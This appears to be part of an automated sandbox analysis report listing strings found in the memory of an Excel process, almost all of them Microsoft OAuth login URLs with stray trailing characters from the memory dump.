Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize3
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize8.
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://login.windows.local
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.localtes;uY
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize6z
Source: EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/com
Source: EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authoriz
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize#
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize$
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize%
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize(
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize)
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize-
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize.
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize2
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize5
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize7
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize8
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize=
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize?
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeA4
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeC
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeE
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeH
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeI
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeJ
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeK
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeN
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeO
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeP
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeR
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeTEM32G
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeVE
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeX
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeZ
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizea
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorized
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeg
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeh
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizej
